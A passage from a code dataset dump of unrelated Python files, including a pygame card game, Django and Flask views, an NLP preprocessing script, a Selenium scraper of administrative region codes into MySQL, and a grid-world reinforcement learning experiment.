await client.subscribe(stream)\n print(f\"Connected to: {stream}\")\n\n # listen for incoming messages\n count = 0\n last_table_data = None\n period_start = datetime.datetime.now()\n period_count = 1\n changes = collections.defaultdict(int)\n async for message in client:\n if args.limit != -1 and count >= args.limit:\n break\n count += 1\n topic = message[\"channel\"]\n data = message[\"data\"]\n changes[topic] += 1\n if args.monitor:\n if count % args.number == 0:\n period_count += 1\n table_data = [[\"stream\", \"replay_id\", \"changes\"]]\n for stream in streams:\n marker = replay[stream]\n table_data.append([stream, marker.replay_id, changes[stream]])\n table = AsciiTable(table_data)\n last_table_data = table_data\n print(\"\\033[2J\")\n print(\"\\033[0;0H\")\n period_end = datetime.datetime.now()\n uptime = period_end - starttime\n period_time = period_end - period_start\n period_start = period_end\n print(f\"Uptime: {uptime}, Period #{period_count}, Period time: {period_time}\")\n print(table.table)\n changes = collections.defaultdict(int)\n else:\n js = json.dumps(data, indent=4)\n print(f\"{topic}: {js}\")\n print(f\"replay: {replay}\")\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-c\", \"--credentials\", type=str, help=\"name of file in ~/.private directory containing login info and list of streams to connect to\")\n parser.add_argument(\"-m\", \"--monitor\", help=\"monitor number of CDC events received\", action=\"store_true\")\n parser.add_argument(\"-r\", \"--replay_id\", type=int, default=-1, help=\"first replay id to fetch\")\n parser.add_argument(\"-l\", \"--limit\", type=int, default=-1, help=\"number of events to show (-1 is infinite)\")\n parser.add_argument(\"-n\", \"--number\", type=int, default=1, help=\"number of events before refreshing monitor table\")\n parser.add_argument(\"-s\", \"--seconds\", type=int, default=1, help=\"number of seconds before refreshing monitor table\")\n args = parser.parse_args()\n\n loop = asyncio.get_event_loop()\n loop.run_until_complete(stream_events())\n
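\n# --- Example invocation (added illustration; flag values are hypothetical):\n# python cdc_util.py -c my_creds -m -n 50\n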
self.AI = player_class.player()\n #self.AI.Hand = self.card_list\n print(self.AI.Hand)\n self.MENU_STATE = False\n self.PICK_HAND_STATE = True\n self.LOGIN_STATE = False\n self.GAME_STATE = True\n self.RESULT_STATE = False\n self.PLAYER_TURN_STATE = True\n self.AI_TURN_STATE = False\n self.BATTLE_STATE = True\n self.AI_BATTLE_STATE = False\n self.MAIN_PHASE = False\n self.AI_MAIN_PHASE = False\n\n while True:\n\n #Runs the pick hand window in the program and stores the rendered cards\n if self.PICK_HAND_STATE:\n self.view.run_pick_hand(self.screen, self.size, self.current_card, self.card_list)\n #Runs the game window in the program\n if self.GAME_STATE:\n self.view.run_game(self.screen,self.size,self.current_card,self.player,self.AI)\n self.player.Deck = self.player_card_list\n self.AI.Deck = self.AI_card_list\n self.player.draw()\n self.AI.draw()\n\n #Event handler\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n if event.type == pygame.KEYDOWN and event.key == pygame.K_RIGHT:\n #Moves the current card tracker to the right\n if self.PICK_HAND_STATE:\n #This code only works in the selecting cards screen\n if self.current_card != (len(self.card_list)-1):\n print(self.card_list[self.current_card].name)\n if self.current_card >= 0 and self.current_card <= (len(self.card_list)-1):\n self.current_card += 1\n elif self.GAME_STATE:\n #This code only works in the game screen\n if self.current_card != (len(self.player.Hand)-1):\n print(self.player.Hand[self.current_card].name)\n if self.current_card >= 0 and self.current_card <= (len(self.player.Hand)-1):\n self.current_card += 1\n\n if event.type == pygame.KEYDOWN and event.key == pygame.K_LEFT:\n #Moves the current card tracker to the left\n if self.PICK_HAND_STATE:\n #This code only works in the selecting card screen\n if self.current_card != (len(self.card_list)-1):\n print(self.card_list[self.current_card].name)\n if self.current_card >= 0 and self.current_card <= (len(self.card_list)-1):\n self.current_card -= 1\n elif self.GAME_STATE:\n #This code only works in the game screen\n if self.current_card != (len(self.player.Hand)-1):\n print(self.player.Hand[self.current_card].name)\n if self.current_card >= 0 and self.current_card <= (len(self.player.Hand)-1):\n self.current_card -= 1\n\n if event.type == pygame.KEYDOWN and event.key == pygame.K_z:\n #When the user presses z, this moves the card from hand to field in game in attack position\n if self.GAME_STATE == True:\n if self.PLAYER_TURN_STATE == True:\n if self.player.Field_Limit():\n if not len(self.player.Hand) == 0:\n card = self.player.Hand.pop(self.current_card)\n card.in_play = True\n card.attack = True\n self.player.Field.append(card)\n self.current_card = 0\n\n if event.type == pygame.KEYDOWN and event.key == pygame.K_x:\n #When the user presses x, this moves the card from hand to field in defense position\n if self.GAME_STATE == True:\n if self.PLAYER_TURN_STATE == True:\n if self.player.Field_Limit():\n if not len(self.player.Hand) == 0:\n card = self.player.Hand.pop(self.current_card)\n card.in_play = True\n card.attack = False\n self.player.Field.append(card)\n self.current_card = 0\n\n if event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:\n #When the user presses space, this ends the player's turn and makes the AI attack\n if self.PLAYER_TURN_STATE == True:\n if self.GAME_STATE == True:\n if self.MAIN_PHASE == True:\n self.MAIN_PHASE = False\n elif self.BATTLE_STATE == True:\n self.BATTLE_STATE = False\n self.AI_TURN_STATE = True\n 
self.AI_MAIN_PHASE = True\n                                print(\"Player ended turn=======================================================================\")\n\n                if event.type == pygame.KEYDOWN and event.key == pygame.K_TAB:\n                    #When the user presses tab, this changes scenes (ex. main menu to card selecting and then to game)\n                    if self.MENU_STATE == True:\n                        self.PICK_HAND_STATE = True\n                        self.MENU_STATE = False\n                        self.view.loading(self.screen)\n                    if self.PICK_HAND_STATE == True:\n                        #Should lock in the deck you chose for the game.\n                        #Then goes to GAME_STATE\n                        self.GAME_STATE = True\n                        self.PICK_HAND_STATE = False\n                        self.view.loading(self.screen)\n                        self.current_card = 0\n\n\n            #This is the code that the AI uses to attack\n            if self.AI_TURN_STATE == True:\n                if self.AI_MAIN_PHASE == True:\n                    if self.AI.Field_Limit():\n                        #Randomly selects a card to use, sets it to attack and then puts it on the field\n                        if not len(self.AI.Hand) == 0:\n                            self.current_card = random.randrange(len(self.AI.Hand))\n                            card = self.AI.Hand.pop(self.current_card)\n                            card.in_play = True\n                            card.attack = True\n                            self.AI.Field.append(card)\n                            self.current_card = 0\n                            self.AI.draw()\n                    self.AI_MAIN_PHASE = False\n                    self.AI_BATTLE_STATE = True\n                if self.AI_BATTLE_STATE == True:\n                    self.current_card = random.randrange(len(self.AI.Field))\n                    self.card_to_attack = random.randrange(len(self.player.Field))\n                    #This part determines what happens to the player's health when the AI attacks\n                    result = self.player.attack_card(self.AI.Field[self.current_card], self.player.Field[self.card_to_attack])\n                    if result > 0:\n                        self.player.Health = self.player.Health - result\n                    elif result < 0:\n                        self.player.Health = self.player.Health + result\n                    self.AI_BATTLE_STATE = False\n                    self.AI_TURN_STATE = False\n                    self.PLAYER_TURN_STATE = True\n                    self.BATTLE_STATE = True\n                    print(\"AI ended turn==========================================================================================\")\n\n\n            #This gets printed out when the player or the AI dies and the game is over\n            if self.player.Health <= 0:\n                print(\"Game Over\")\n            if self.AI.Health <= 0:\n                print(\"You Won!\")\n\n            pygame.display.update()\n            self.clock.tick(60)\n","sub_path":"Controller.py","file_name":"Controller.py","file_ext":"py","file_size_in_byte":9177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"30051891","text":"from django.template.context_processors import request\nfrom index.forms import SubscribeForm, BookingTourForm, BookingRoomForm, ContactForm\nfrom index.models import Comment, Category\nfrom sitesettings.models import Social, Contact, Partner, Deal, Hotlink\n\ndef index(request):\n\tcontact_form = ContactForm()\n\tsubscribe_form = SubscribeForm()\n\tbooking_tour_form = BookingTourForm()\n\tbooking_room_form = BookingRoomForm()\n\n\tcomments = Comment.objects.all()\n\tsocials = Social.objects.all()\n\tcontact = Contact.objects.first()\n\tpartners = Partner.objects.all()\n\tdeals = Deal.objects.all()\n\thotlinks = Hotlink.objects.all()\n\n\tcategories = Category.objects.all()\n\n\treturn {\n\t\t'contact_form' : contact_form,\n\t\t'subscribe_form' : subscribe_form,\n\t\t'booking_tour_form' : booking_tour_form,\n\t\t'booking_room_form' : booking_room_form,\n\n\t\t'comments' : comments,\n\t\t'socials' : socials,\n\t\t'contact' : contact,\n\t\t'partners' : partners,\n\t\t'deals' : deals,\n\t\t'hotlinks' : hotlinks,\n\n\t\t'categories' : 
categories\n\t}","sub_path":"index/context_processors/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"359301642","text":"from flask import Flask, render_template, jsonify, request\nfrom flask_sqlalchemy import SQLAlchemy\nfrom app import app, db\nfrom models import Stats\n\n\n@app.route('/', defaults={'path': ''})\n@app.route('/<path:path>')\ndef any_root_path(path):\n    stats = Stats.reset_stats()\n    return render_template('index.html')\n\n\n@app.route(\"/api/get_growth_data\", methods=[\"GET\"])\ndef get_growth_data():\n    stats = Stats.get_stats()\n    return jsonify(stats=stats)\n\n@app.route(\"/api/update_growth_data\", methods=[\"POST\"])\ndef update_growth_data():\n    incoming = request.get_json()\n    updateStat = Stats.update_data(incoming)\n    stats = Stats.get_stats()\n    return jsonify(stats=stats,error=updateStat)\n\n@app.route(\"/api/remove_growth_data\", methods=[\"POST\"])\ndef remove_growth_data():\n    incoming = request.get_json()\n    rmStat = Stats.remove_data(incoming['name'])\n    stats = Stats.get_stats()\n    return jsonify(stats=stats,error=rmStat)\n\n","sub_path":"routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"238182528","text":"import random\n\nrandom.seed(0)\nfin = open(\"dataset/web_reviews/psst-tokens.tsv\",'r')\n\ndata=fin.readlines()\n\nx_tups = []\n\nfor line in data:\n\twords = line.strip(\"\\n\").strip().split(\"\\t\")\n\tlid = words[0].strip()\n\tprep = words[1].strip().split()\n\tsense = words[2].strip()\n\tsentence = words[3].strip()\n\n\tsent_split = sentence.split(\"|\")\n\tleft_context = sent_split[0].strip().split()\n\tright_context = sent_split[-1].strip().split()\n\n\ttup = (lid, prep, left_context, right_context, sense)\n\n\tx_tups.append(tup)\n\n\nprint(\"input taken in. size is - \", len(x_tups))\n#calc. 
uniques\n\nuniques = set()\n\nu_ids = set()\nu_senses = set()\n\nfor tup in x_tups:\n\t\n\tu_ids.add(tup[0])\n\tu_senses.add(tup[-1])\n\tall_words = tup[1] + tup[2] + tup[3]\n\tfor word in all_words:\n\t\tfinal_word = word.lower()\n\t\tuniques.add(final_word)\n\nprint(\"unique_ids are - \", len(u_ids))\nprint(\"unique senses are - \", len(u_senses))\n#from word vectors file\n\n\nfilevec = \"word_vectors/glove.6B.50d.txt\"\ndimensions = 50\nword_vectors = []\n\nwith open(filevec,\"r\") as fin:\n\tfor line in fin:\n\t\twords = line.strip(\"\\n\").strip().split()\n\t\tif(len(words) == (dimensions + 1)):\n\t\t\tword_vectors.append(words[0])\n\n#checking in word vectors file.\nfound = 0\ntotal = 0\n\nfor word in uniques:\n\ttotal += 1\n\tif word in word_vectors:\n\t\tfound += 1\n\nprint(\"vocab size is - \", total, \"found vectors for - \", found)\n\nu_senses = list(u_senses)\n\nsense2id = {}\nid2sense = {}\n\nfor i in range(len(u_senses)):\n\tsense2id[u_senses[i]] = i\n\tid2sense[i] = u_senses[i]\n\nuniques = list(uniques)\n\nw2id = {}\nid2w = {}\n\nfor i in range(len(uniques)):\n\tw2id[uniques[i]] = i\n\tid2w[i] = uniques[i]\n\nw2id[\"\"] = len(uniques)\nid2w[len(uniques)] = \"\"\n\nx_tups_again = []\n\nfor tup in x_tups:\n\tprepn = []\n\tfor w in tup[1]:\n\t\tprepn.append(w2id[w.lower()])\n\n\tlcn = []\n\tfor w in tup[2]:\n\t\tlcn.append(w2id[w.lower()])\n\n\trcn = []\n\tfor w in tup[3]:\n\t\trcn.append(w2id[w.lower()])\n\n\tsensen = sense2id[tup[4]]\n\n\tx_tups_again.append((tup[0], prepn, lcn, rcn, sensen))\n\nx_tups = x_tups_again\n\n\n#sentMax padding\nsentMax = -1\n\n\n\n#process x_tups by converting everything into ids.\n#finally I have w2id, id2w, sense2id, and x_tups with same form but all replaced with ids.\n\n#now divide in train,test, dev.\n\nftest = open(\"dataset/web_reviews/psst-test.sentids\", \"r\")\n\ntest_ids = ftest.readlines()\n\ntest_set_ids = []\n\nids_considered = set()\n\nfor tid in test_ids:\n\ttid = tid.strip(\"\\n\").strip()\n\n\ttest_set_ids.append(tid)\n\nx_tups_test = []\nx_tups_train = []\n\nfor tup in x_tups:\n\tif(tup[0].split(\":\")[0] in test_set_ids) and (tup[0].split(\":\")[0] not in ids_considered):\n\t\tx_tups_test.append(tup)\n\t\tids_considered.add(tup[0].split(\":\")[0])\n\telse:\n\t\tx_tups_train.append(tup)\n\nrandom.shuffle(x_tups_train)\n\nx_tups_dev = x_tups_train[:450]\nx_tups_train = x_tups_train[450:]\n\nrandom.shuffle(x_tups_train)\nrandom.shuffle(x_tups_dev)\nrandom.shuffle(x_tups_test)\n\nprint(\"different datasets prepared. 
sizes are - \", len(x_tups_train), len(x_tups_dev), len(x_tups_test))\n\n","sub_path":"src/data_preprocessing.py","file_name":"data_preprocessing.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"377515730","text":"from ..models.person import Person\nfrom ..serializers.person import PersonSerializer\n\nfrom django.http import Http404\nfrom ..serializers.person import PersonSerializer\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\nfrom django.db.models import Q\n\n\nclass PersonView(APIView):\n \"\"\"\n Person view \n \"\"\"\n serializer_class = PersonSerializer\n\n def get(self, request, id, format=None):\n if(id > 0):\n person = Person.objects.get(pk=id)\n serializer = PersonSerializer(person)\n else:\n person = Person()\n person.save()\n serializer = PersonSerializer(person)\n return Response(serializer.data)\n\n\nclass AllPersonsView(APIView):\n\n \"\"\"\n Fetch All Person items\n \"\"\"\n\n def get(self, request):\n persons = Person.objects.all()\n serializer = PersonSerializer(persons, many=True)\n return Response(serializer.data)\n\n\nclass SavePersonView(APIView):\n \"\"\"\n Save Person view \n \"\"\"\n serializer_class = PersonSerializer\n\n def post(self, request, format=None):\n id = request.data['id']\n person = Person.objects.get(pk=id)\n serializer = PersonSerializer(person, request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_200_OK)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass PersonSearchView(APIView):\n \"\"\"\n Search Person[] view \n \"\"\"\n serializer_class = PersonSerializer\n\n def get(self, request, format=None):\n query = request.query_params.get('query')\n query_cap = query.capitalize()\n\n by_name = Q(name__icontains=query)\n by_cap_name = Q(name__icontains=query_cap)\n by_code = Q(rail_code__icontains=query)\n by_street_house = Q(street_house__icontains=query)\n by_cap_street_house = Q(street_house__icontains=query_cap)\n filtered_persons = Person.objects.filter(\n by_code | by_name | by_cap_name | by_street_house | by_cap_street_house)\n\n serializer = PersonSerializer(filtered_persons, many=True)\n return Response(serializer.data)\n","sub_path":"rest/views/person.py","file_name":"person.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"639147771","text":"import pandas as pd\nfrom pandas import ExcelWriter\n#from pandas import ExcelFile\nimport numpy as np\n\n'''\nimport pandas\nwriter = pandas.ExcelWriter('Masterfile.xlsx')\ndata_filtered.to_excel(writer, \"Main\", cols=['Diff1', 'Diff2'])\nwriter.save()\n\n# -------------------------\nimport pandas\nfrom openpyxl import load_workbook\n\nbook = load_workbook('Masterfile.xlsx')\nwriter = pandas.ExcelWriter('Masterfile.xlsx', engine='openpyxl')\nwriter.book = book\nwriter.sheets = dict((ws.title, ws) for ws in book.worksheets)\ndata_filtered.to_excel(writer, \"Main\", cols=['Diff1', 'Diff2'])\nwriter.save()\n\n'''\ns1 = '1001:fgwukjoipqvujse0xfhybd5h6200,Pallet Rexroth circulation roller bearing NP60 NP60 EC'\ns2 = '1002:fgwukjoipqvujse0xfhybd5h6200, FAG Pallet stop arm bearing with RHP or Rexworth MNR R162472220'\ns3 = '1003:y1mowwdcd1wwng3pajoxjbff68700,TIMKEN BEARING (WHEEL) Q2019-058 Sheen Spark Q2019-058'\ns4 = 
'1004:fi2r11ncqz3ldgo2gfryducd67104,FYTWK30YTH-* SKF cancelled po RHP, NSK do not use this line cancelled po do not use this line cancelled po do not use this line'\ns5 = '1005:0M80-8KDJ93,7216 bep Bearing N/A N/A or maybe TIMKEN'\ns6 = '1005:0M80-8KDJ93,7216 bert Bearing N/A N/A or maybe TUMKEN'\ns7 = 'Gimme some of that SKF !'\n\nstrings = [s1, s2, s3, s4, s5, s6, s7]\nmanuf_list = ['Rexroth','SKF', 'NSK', 'RHP', 'TIMKEN', 'FAG', 'Sheen Spark', 'bep']\nw_Manufs = []\nw_Manuf_Alts = []\nmanuf = ''\nalts = ''\n\nj = 1\nfor s in strings:\n    i = 0\n    for m in manuf_list:\n        # case: if there's a manuf in the string (find returns -1 when absent)\n        loc = s.find(m, 0)\n        if loc != -1:\n            if i == 0:\n                # if it's the first manuf in the sentence, put it in w_Manufs\n                manuf = m\n                i += 1\n            else:\n                # if it's not the first manuf in the sentence, put it in alts\n                if alts == '':\n                    alts = m\n                else:\n                    alts = alts + ', ' + m\n        else:\n            continue\n\n    w_Manufs.append(manuf.upper())\n    w_Manuf_Alts.append(alts.upper())\n\n    # test ---------------\n    print('str ', j, 'w_Manufs: ', w_Manufs)\n    print('str ', j, 'w_Manuf_Alts: ', w_Manuf_Alts)\n    # test ---------------\n\n    manuf = ''\n    alts = ''\n    j += 1\n\ndf = pd.DataFrame({'w_Manuf':w_Manufs,\n                   'w_Manuf_Alt':w_Manuf_Alts})\n\nwriter = pd.ExcelWriter('demo_pandas_manufs.xlsx')\ndf.to_excel(writer,'NERS_Manufs', index=False)\nwriter.save()\n","sub_path":"store/model/brmr_erp1/pandas_test.py","file_name":"pandas_test.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"314799810","text":"from selenium import webdriver\nimport pymysql\n\nclass GovSpider(object):\n    def __init__(self):\n        self.url = 'http://www.mca.gov.cn/article/sj/xzqh/2019/'\n        # Run Chrome in headless (no-GUI) mode\n        self.options = webdriver.ChromeOptions()\n        self.options.add_argument('--headless')\n        self.browser = webdriver.Chrome(options=self.options)\n        self.db = pymysql.connect(\n            'localhost','root','123456','govdb',charset='utf8'\n        )\n        self.cursor = self.db.cursor()\n        # Used with executemany([(),(),()])\n        self.province = []\n        self.city = []\n        self.county = []\n\n    # Fetch the data\n    def get_data(self):\n        self.browser.get(self.url)\n        node = self.browser.find_element_by_partial_link_text('县以上行政区划代码')\n        # First check whether this node has been scraped before\n        link = node.get_attribute('href')\n        sel = 'select url from version where url=%s'\n        result = self.cursor.execute(sel,[link])\n        if not result:\n            # 1. Scrape it\n            self.get_code(node)\n            # 2. Store this link in the version table of the database\n            ins = 'insert into version values(%s)'\n            self.cursor.execute(ins,[link])\n            self.db.commit()\n        else:\n            print('Not updated')\n\n    # Do the actual scraping\n    def get_code(self,node):\n        node.click()\n        # Switch to the new window handle\n        all = self.browser.window_handles\n        self.browser.switch_to.window(all[1])\n        # Extract the rows\n        tr_list = self.browser.find_elements_by_xpath('//tr[@height=\"19\"]')\n        for tr in tr_list:\n            name = tr.text.split()[1]\n            code = tr.text.split()[0]\n            print(name,code)\n            # e.g. Shanghai / Shanghai / Pudong New Area\n            if code[-4:] == '0000':\n                self.province.append((name,code))\n                # Add the 4 municipalities directly under the central government to the city table\n                if code[:2] in ['11','12','31','50']:\n                    self.city.append((name,code,code))\n\n            elif code[-2:] == '00':\n                pcode = code[:2] + '0000'\n                self.city.append((name,code,pcode))\n                # Record the code of the most recently seen city\n                last_city = code\n            else:\n                if code[:2] in ['11','12','31','50']:\n                    ccode = code[:2] + '0000'\n                else:\n                    ccode = last_city\n                self.county.append((name,code,ccode))\n\n        self.insert_mysql()\n\n    def insert_mysql(self):\n        # 1. Clear out the existing data first\n        del1 = 'delete from province'\n        del2 = 'delete from city'\n        del3 = 'delete from county'\n        self.cursor.execute(del1)\n        self.cursor.execute(del2)\n
        self.cursor.execute(del3)\n        self.db.commit()\n        # 2. Insert the new data\n        ins1 = 'insert into province values(%s,%s)'\n        ins2 = 'insert into city values(%s,%s,%s)'\n        ins3 = 'insert into county values(%s,%s,%s)'\n        self.cursor.executemany(ins1,self.province)\n        self.cursor.executemany(ins2,self.city)\n        self.cursor.executemany(ins3,self.county)\n        self.db.commit()\n\n    def run(self):\n        self.get_data()\n        self.browser.quit()\n\nif __name__ == '__main__':\n    spider = GovSpider()\n    spider.run()\n","sub_path":"spider爬虫/day08/04_gov.py","file_name":"04_gov.py","file_ext":"py","file_size_in_byte":3303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"79104802","text":"# -*- coding: utf-8 -*-\nimport json\nimport hashlib\nimport logging\nimport re\nimport requests\n\nfrom django.views.decorators.http import require_GET, require_POST\nfrom django.conf import settings\n\nfrom luckycommon.third.image import get_token, delete_data_by_key\nfrom luckycommon.order.db import order as order_db\nfrom luckycommon.order.model.order import AwardedOrder, ORDER_STATUS\n\nfrom luckycommon.utils.api import token_required\nfrom luckycommon.utils.decorator import response_wrapper\nfrom luckycommon.utils.exceptions import DataError, ParamError\n\n_LOGGER = logging.getLogger('lucky')\n\n\n@require_GET\n@response_wrapper\n@token_required\ndef get_qiniu_token(req):\n    bucket_name = settings.USER_BUCKET_NAME\n    token = get_token(bucket_name, expires=3600)\n    return {\"token\": token, \"host\": settings.QINIU_DOMAIN,\n            \"bucket\": bucket_name}\n\n\n@require_POST\n@response_wrapper\n@token_required\ndef delete_data(req):\n    query_dct = json.loads(req.body)\n    bucket_name = settings.USER_BUCKET_NAME\n    keys = query_dct.get('keys', [])\n    assert isinstance(keys, list)\n    if keys:\n        delete_data_by_key(keys, bucket_name)\n\n    return {}\n\n@require_GET\n@response_wrapper\ndef datacell_f(req):\n    _LOGGER.error('It seems Datacell Fail, %s', req.body)\n    return {}\n\n\n@response_wrapper\ndef datacell_s(req):\n    _LOGGER.error('It seems Datacell , %s', req.body)\n    return {}\n\n@response_wrapper\ndef mobilepulsa(req):\n    _LOGGER.info('It seems pulsa , %s, %s, %s', req.body, req.GET,req.POST)\n    if '2' in req.body:\n        l = re.compile(r'\\.*\\<\\/ref_id')\n        p = l.search(req.body)\n        if p:\n            order_id = int(p.group()[8:-8])\n            _LOGGER.error('beiju, pulsa charge fail, %s', order_id)\n            # order_db.update_order_info(\n            #     order_id,\n            #     {'status': ORDER_STATUS.AWARDED}, None, True\n            # )\n    return {}\n\n\n@require_GET\n@response_wrapper\ndef bluepay(req):\n    _LOGGER.error('It seems Bluepay, %s', req.GET)\n    return {'status':200}\n","sub_path":"luckyapi/views/third.py","file_name":"third.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"622898873","text":"#!/usr/bin/env python\n\nfrom segmentcentroid.envs.GridWorldEnv import GridWorldEnv\nfrom segmentcentroid.tfmodel.GridWorldMiddleModel import GridWorldMiddleModel\nfrom segmentcentroid.planner.value_iteration import ValueIterationPlanner\nfrom segmentcentroid.planner.traj_utils import *\n\nimport numpy as np\nimport copy\n\nimport tensorflow as tf\n\ndef inRoom1(state):\n    return (state[1] <= 3) \n\ndef inRoom2(state):\n    return (state[1] > 16) \n\n#two rooms start end \n\ndef runPolicies(demonstrations=20,\n                super_iterations=2000,\n                sub_iterations=0,\n                learning_rate=10,\n                env_noise=0.3):\n\n    m = GridWorldMiddleModel(2, 
statedim=(10,20))\n\n MAP_NAME = 'resources/GridWorldMaps/experiment1.txt'\n gmap = np.loadtxt(MAP_NAME, dtype=np.uint8)\n full_traj = []\n vis_traj = []\n\n for i in range(0,demonstrations):\n print(\"Traj\",i)\n g = GridWorldEnv(copy.copy(gmap), noise=env_noise)\n\n start = np.argwhere(g.map == g.START)[0]\n goal = np.argwhere(g.map == g.GOAL)[0]\n #generate trajectories start in same room and end different room\n while not ((inRoom1(start) and inRoom2(goal)) or\\\n (inRoom2(start) and inRoom1(goal))):\n g.generateRandomStartGoal()\n start = np.argwhere(g.map == g.START)[0]\n goal = np.argwhere(g.map == g.GOAL)[0]\n\n\n print(np.argwhere(g.map == g.START), np.argwhere(g.map == g.GOAL))\n\n v = ValueIterationPlanner(g)\n traj = v.plan(max_depth=100)\n \n new_traj = []\n for t in traj:\n a = np.zeros(shape=(4,1))\n\n s = np.zeros(shape=(10,20))\n\n a[t[1]] = 1\n\n s[t[0][0],t[0][1]] = 1\n #s[2:4,0] = np.argwhere(g.map == g.START)[0]\n #s[4:6,0] = np.argwhere(g.map == g.GOAL)[0]\n\n new_traj.append((s,a))\n\n full_traj.append(new_traj)\n vis_traj.extend(new_traj)\n\n #raise ValueError(\"\")\n\n #g.visualizePlan(vis_traj,blank=True, filename=\"resources/results/exp1-trajs.png\")\n\n\n m.sess.run(tf.initialize_all_variables())\n\n with tf.variable_scope(\"optimizer\"):\n opt = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)\n\n m.train(opt, full_traj, super_iterations, sub_iterations)\n\n actions = np.eye(4)\n\n\n g = GridWorldEnv(copy.copy(gmap), noise=0.1)\n g.generateRandomStartGoal()\n\n for i in range(m.k):\n states = g.getAllStates()\n policy_hash = {}\n trans_hash = {}\n\n for s in states:\n\n t = np.zeros(shape=(10,20))\n\n t[s[0],s[1]] = 1\n #t[2:4,0] = np.argwhere(g.map == g.START)[0]\n #t[4:6,0] = np.argwhere(g.map == g.GOAL)[0]\n\n\n l = [ np.ravel(m.evalpi(i, [(t, actions[j,:])] )) for j in g.possibleActions(s)]\n\n if len(l) == 0:\n continue\n\n #print(i, s,l, m.evalpsi(i,ns))\n action = g.possibleActions(s)[np.argmax(l)]\n\n policy_hash[s] = action\n\n #print(\"Transition: \",m.evalpsi(i, [(t, actions[1,:])]), t)\n trans_hash[s] = np.ravel(m.evalpsi(i, [(t, actions[1,:])]))\n\n g.visualizePolicy(policy_hash, trans_hash, blank=True, filename=\"resources/results/exp1b-policy\"+str(i)+\".png\")\n\n\n\n\n","sub_path":"segmentcentroid/experiments/experiment1b.py","file_name":"experiment1b.py","file_ext":"py","file_size_in_byte":3255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"486479699","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('push_backends', '0007_auto_20140923_1129'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='mailchimppushbackend',\n name='test_emails',\n field=models.CharField(default='', max_length=512),\n preserve_default=False,\n ),\n ]\n","sub_path":"apps/push_backends/migrations/0008_mailchimppushbackend_test_emails.py","file_name":"0008_mailchimppushbackend_test_emails.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"82005909","text":"# -*- coding: utf-8 -*-\n##----------------------------------------------------------------------\n## Settings model\n##----------------------------------------------------------------------\n## Copyright (C) 2007-2015 The NOC Project\n## See LICENSE for 
details\n##----------------------------------------------------------------------\n\n# Python modules\nimport base64\nimport json\n\nimport os\n\n# Third-party modules\nfrom peewee import Model, CharField, TextField, DoesNotExist\n# Tower modules\nfrom db import db\n\n\nclass Settings(Model):\n class Meta:\n database = db\n db_table = \"settings\"\n\n key = CharField(primary_key=True)\n value = TextField()\n\n DEFAULTS = {\n \"url\": \"http://example.com/\",\n \"repo_url\": \"http://example.com/hg\",\n \"installation_name\": \"Unconfigured installation\"\n }\n\n @classmethod\n def get_item(cls, name):\n with db.atomic():\n try:\n return json.loads(\n Settings.get(Settings.key == name).value\n )\n except DoesNotExist:\n raise KeyError\n\n @classmethod\n def get_items(cls, names):\n r = {}\n with db.atomic():\n for s in Settings.select().where(Settings.key << list(names)):\n r[s.key] = json.loads(s.value)\n return r\n\n @classmethod\n def set_item(cls, name, value):\n value = json.dumps(value)\n with db.atomic():\n r = list(Settings.select().where(Settings.key == name))\n if len(r) == 0:\n r = Settings(\n key=name,\n value=value\n )\n r.save(force_insert=True)\n else:\n # Update\n r[0].value = value\n r[0].save()\n\n @classmethod\n def get_cookie_secret(cls):\n try:\n return Settings.get_item(\"cookie_secret\")\n except KeyError:\n secret = base64.b64encode(os.urandom(64))\n Settings.set_item(\"cookie_secret\", secret)\n return secret\n\n @classmethod\n def get_url(cls):\n \"\"\"\n Return tower's URL\n :return:\n \"\"\"\n try:\n return Settings.get_item(\"url\")\n except KeyError:\n return cls.DEFAULTS[\"url\"]\n\n @classmethod\n def get_repo_url(cls):\n \"\"\"\n Return tower's URL\n :return:\n \"\"\"\n try:\n return Settings.get_item(\"repo_url\")\n except KeyError:\n return cls.DEFAULTS[\"repo_url\"]\n\n @classmethod\n def get_installation_name(cls):\n \"\"\"\n Return tower's installation name\n :return:\n \"\"\"\n try:\n return Settings.get_item(\"installation_name\")\n except KeyError:\n return cls.DEFAULTS[\"installation_name\"]\n","sub_path":"tower/models/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"244345167","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\n\n\ndef gridcreate(name, y, x, ratio, z, **kwargs):\n # Function that creates a blank axis canvas; each 